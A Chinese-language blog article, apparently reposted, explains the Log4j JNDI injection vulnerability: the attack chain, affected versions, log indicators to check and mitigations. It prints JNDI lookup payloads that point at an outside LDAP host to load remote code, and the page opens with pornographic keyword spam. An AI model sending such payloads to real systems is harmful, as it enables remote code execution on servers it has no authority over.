国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

log4j漏洞詳解

這篇具有很好參考價(jià)值的文章主要介紹了log4j漏洞詳解。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

一.什么是log4j?

log4j全名就是(log for java),就是apache的一個(gè)開(kāi)源的日志記錄組件 ,它在Java項(xiàng)目中使用的比較廣泛。

使用方法:

??????????????? 1.pom引入依賴

??????????????? 2.獲取logger實(shí)例

??????????????? 3.logger.info() debug() error() warn()...

優(yōu)點(diǎn):功能豐富,易于集成

二.排查log4j

哈哈,先來(lái)檢查一下你們公司有沒(méi)有l(wèi)og4j的漏洞,估計(jì)都是修復(fù)了,當(dāng)時(shí)可是掀起血雨腥風(fēng)啊

1.pom檢查

2.可以通過(guò)日志中是否存在"jndi:ladp://"、"jndi:rmi://","dnslog.cn",等字符來(lái)看看有沒(méi)有別人在搞你

3.檢查日志中是否有相關(guān)堆棧報(bào)錯(cuò),堆棧中是否有一些JndiLookup,LdapURLContext等與JNDI調(diào)用相關(guān)的堆棧信息。

三.什么是JNDI注入

??? JNDI(Java Naming and Directory Interface,Java命名和目錄接口)是SUN公司提供的一種標(biāo)準(zhǔn)的Java命名系統(tǒng)接口,JNDI提供統(tǒng)一的客戶端API,通過(guò)不同的訪問(wèn)提供者接口JNDI服務(wù)供應(yīng)接口(SPI)的實(shí)現(xiàn),舉個(gè)例子:它就相當(dāng)于的你的一個(gè)秘書(shū),用了一些手段,你可以去指使他去干一些事情,這個(gè)手段就是lookup(),相當(dāng)于你給秘書(shū)一個(gè)目標(biāo)。

log4j漏洞,java,開(kāi)發(fā)語(yǔ)言,分布式

?四.什么是命名應(yīng)用(JNDI naming Reference)

先給這些名詞簡(jiǎn)單說(shuō)一下

Ldap:你可以將它理解為一個(gè)目標(biāo)數(shù)據(jù)庫(kù)。

然后這個(gè)命名引用就是:

1.在這個(gè)目標(biāo)數(shù)據(jù)庫(kù)(LDAP)中可以存儲(chǔ)一個(gè)外部的資源,對(duì)應(yīng)的Reference類

比如說(shuō)HTTP服務(wù)的一個(gè).class文件

2.如果JNDI客戶端,在LDAP服務(wù)上找不到對(duì)應(yīng)的資源,就會(huì)到指定的地址請(qǐng)求數(shù)據(jù),如果是命名引用的,就會(huì)將這個(gè)文件下載到本地。

3.如果你下載的這個(gè).class文件包含無(wú)參構(gòu)造函數(shù)或者靜態(tài)方法塊,那么加載的時(shí)候他會(huì)自動(dòng)執(zhí)行

四.漏洞原理

首先先來(lái)看一下網(wǎng)絡(luò)上流傳最多的payload

${jndi:ldap://2lnhn2.ceye.io}

在java中最常用的日志框架是log4j2和logback,其中l(wèi)og4j2支持lookup功能(查找搜索),這也是一個(gè)非常強(qiáng)大的功能,設(shè)計(jì)之初的目的也是為了方便開(kāi)發(fā)者調(diào)用,還支持輸出系統(tǒng)環(huán)境變量等功能,這樣極大的方便了開(kāi)發(fā)者。但是安全問(wèn)題往往就是因?yàn)椤伴_(kāi)發(fā)人員圖快捷”引起的,畢竟設(shè)計(jì)者也是需要在安全性和用戶體驗(yàn)之間做個(gè)平衡,但是如果只是打印日志的話沒(méi)沒(méi)有什么危害,但是,打印系統(tǒng)變量這種對(duì)系統(tǒng)而言構(gòu)不成什么威脅。最終要的原因是log4j還支持JNDI協(xié)議。而且這個(gè)JNDI協(xié)議中還支持lookup()方法,那么這個(gè)漏洞就危害比較大了。

整個(gè)攻擊鏈:

攻擊者在漏洞點(diǎn)注入表達(dá)式如${jndi:ldap://xxx.xxx.xxx/exploit}---》然后log4j2支持lookup()方法----》log4j2支持JNDI------》 ldap/rmi 遠(yuǎn)程加載攻擊者服務(wù)器上的class文件構(gòu)建對(duì)象(LDAP/RMI中有個(gè)命名引用功能) -----》尋找本地的惡意代碼并執(zhí)行

漏洞條件

1.使用了log4j的組件,并且版本在2.x <= 2.14.1

2.JDK版本小于8u191,7u201,6u211

漏洞修復(fù)與防御

等你把上面看完了,你也就知道怎么去修復(fù)了,歡迎補(bǔ)充!?。?/p>

1.禁止用戶請(qǐng)求參數(shù)出現(xiàn)攻擊關(guān)鍵字

2.禁止Lookup下載遠(yuǎn)程文件(命名引用)

3.禁止log4j使用Lookup

4.禁止log4j的應(yīng)用連接 外網(wǎng)

5.可以直接在log4j jar包中刪除lookup (2.10以下)文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-597776.html

到了這里,關(guān)于log4j漏洞詳解的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • log4j漏洞原理及攻擊流程

    log4j漏洞原理及攻擊流程

    log4j漏洞最早出現(xiàn)在2021年11月24日一位阿里安全團(tuán)隊(duì)的員工發(fā)現(xiàn)的,上報(bào)到Apache之后,12月10日凌晨才被公開(kāi)。該漏洞威脅等級(jí)較高。基本比肩與阿里當(dāng)年的fastjson漏洞。 漏洞地址: Log4j是一種流行的Java日志記錄工具,其升級(jí)版本Log4j 2存在安全漏洞。這個(gè)漏洞是由Log4j 2的lookup功

    2024年02月16日
    瀏覽(26)
  • 017-信息打點(diǎn)-語(yǔ)言框架&開(kāi)發(fā)組件&FastJson&Shiro&Log4j&SpringBoot等

    017-信息打點(diǎn)-語(yǔ)言框架&開(kāi)發(fā)組件&FastJson&Shiro&Log4j&SpringBoot等

    1、CMS指紋識(shí)別-不出網(wǎng)程序識(shí)別 2、開(kāi)發(fā)框架識(shí)別-PHPPythonJava 3、開(kāi)發(fā)組件識(shí)別-Java常見(jiàn)安全漏洞組件 解決: 1、CMS識(shí)別到后期漏洞利用和代碼審計(jì) 2、開(kāi)發(fā)框架識(shí)別到后期漏洞利用和代碼審計(jì) 3、開(kāi)發(fā)組件識(shí)別到后期漏洞利用和代碼審計(jì) 演示案例: ?指紋識(shí)別-本地工具-GotoSc

    2024年01月21日
    瀏覽(19)
  • fastJson反序列化漏洞和log4j漏洞

    有 attach.class (編譯好的文件) 攻擊者建立rmi服務(wù)端,于rmi服務(wù)端建造一系列攻擊對(duì)象 ,假設(shè)遠(yuǎn)程地址為 http://abc,可url鏈接到惡意class-attach.class 若被攻擊者訪問(wèn)到此服務(wù) rmi://abc/attach.class ,靜態(tài)代碼塊會(huì)優(yōu)先加載,無(wú)需構(gòu)造對(duì)象。 fastJson通過(guò)序列化漏洞 fastJson=1.2.47 (高版本添

    2024年02月16日
    瀏覽(25)
  • 【實(shí)戰(zhàn)】一次簡(jiǎn)單的log4j漏洞測(cè)試

    【實(shí)戰(zhàn)】一次簡(jiǎn)單的log4j漏洞測(cè)試

    更新時(shí)間:2021.12.19 參考文檔:https://www.yuque.com/u8021480/crow/dg9xax 在去年 log4j 漏洞剛爆發(fā)的時(shí)候,很多平臺(tái)都存在漏洞,當(dāng)時(shí)也在第一時(shí)間在有授權(quán)的情況下對(duì)某論壇進(jìn)行了滲透測(cè)試,結(jié)果發(fā)現(xiàn)存在漏洞,報(bào)告之后,漏洞也被很快修復(fù)。 本次對(duì)該滲透過(guò)程進(jìn)行一個(gè)簡(jiǎn)單的記錄

    2023年04月26日
    瀏覽(60)
  • 深入解析著名的阿里云Log4j 漏洞

    幾乎每個(gè)系統(tǒng)都會(huì)使用日志框架,用于記錄日志信息,這些信息可以提供程序運(yùn)行的上下文,但是日志過(guò)多也會(huì)影響系統(tǒng)的性能,所以好的日志框架應(yīng)該是可靠,快速和可擴(kuò)展的。 Apache Log4j2 是一個(gè)基于 Java 的日志工具,是Log4j的升級(jí)版本,引入了很多豐富的特性,包括高性

    2024年02月16日
    瀏覽(21)
  • 修復(fù)中間件log4j漏洞方案(直接更換漏洞jar包)

    修復(fù)中間件log4j漏洞方案(直接更換漏洞jar包)

    后臺(tái)服務(wù)里面的log4j漏洞我們已經(jīng)全部升級(jí)處理了,但是一些中間件鏡像包里的log4j漏洞需要單獨(dú)處理 解決辦法以ElasticSearch7.6.2為例: (1)找到容器里面有哪些舊的log4j依賴包 (2)去官網(wǎng)找到對(duì)應(yīng)新版本的依賴包 (3)把新的依賴包復(fù)制到和舊的同文件夾下 (4)刪除舊的依

    2024年02月10日
    瀏覽(34)
  • Java中的Log4j是什么?如何使用Log4j進(jìn)行日志管理

    Log4j是一個(gè)Java日志管理工具,它可以幫助開(kāi)發(fā)者在應(yīng)用程序中記錄日志。它是由Apache軟件基金會(huì)開(kāi)發(fā)和維護(hù)的,已經(jīng)成為Java開(kāi)發(fā)中最流行的日志管理框架之一。 Log4j可以通過(guò)多種方式記錄日志,包括控制臺(tái)輸出、文件輸出、數(shù)據(jù)庫(kù)存儲(chǔ)等。此外,Log4j還提供了多種日志級(jí)別,

    2024年02月04日
    瀏覽(34)
  • Web網(wǎng)絡(luò)安全-----Log4j高危漏洞原理及修復(fù)

    Web網(wǎng)絡(luò)安全-----Log4j高危漏洞原理及修復(fù)

    Web網(wǎng)絡(luò)安全-----紅藍(lán)攻防之信息收集 Log4j 即 log for java(java的日志) ,是Apache的一個(gè)開(kāi)源項(xiàng)目,通過(guò)使用Log4j,我們可以控制日志信息輸送的目的地是控制臺(tái)、文件、GUI組件,甚至是套接口服務(wù)器、NT的事件記錄器、UNIX Syslog守護(hù)進(jìn)程等;我們也可以控制每一條日志的輸出格式;

    2024年02月10日
    瀏覽(24)
  • CVE-2021-44228 Apache log4j 遠(yuǎn)程命令執(zhí)行漏洞

    CVE-2021-44228 Apache log4j 遠(yuǎn)程命令執(zhí)行漏洞

    一、漏洞原理 log4j(log for java)是由Java編寫的可靠、靈活的日志框架,是Apache旗下的一個(gè)開(kāi)源項(xiàng)目,使用Log4j,我們更加方便的記錄了日志信息,它不但能控制日志輸出的目的地,也能控制日志輸出的內(nèi)容格式;通過(guò)定義不同的日志級(jí)別,可以更加精確的控制日志的生成過(guò)程,

    2024年02月08日
    瀏覽(33)
  • Web攻防--JNDI注入--Log4j漏洞--Fastjson反序列化漏洞

    Web攻防--JNDI注入--Log4j漏洞--Fastjson反序列化漏洞

    什么是JNDI JNDI全稱為 Java Naming and Directory Interface(Java命名和目錄接口),是一組應(yīng)用程序接口,為開(kāi)發(fā)人員查找和訪問(wèn)各種資源提供了統(tǒng)一的通用接口,可以用來(lái)定義用戶、網(wǎng)絡(luò)、機(jī)器、對(duì)象和服務(wù)等各種資源。 JNDI支持的服務(wù)主要有:DNS、LDAP、CORBA、RMI等。 簡(jiǎn)單從安全角度

    2024年02月09日
    瀏覽(26)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包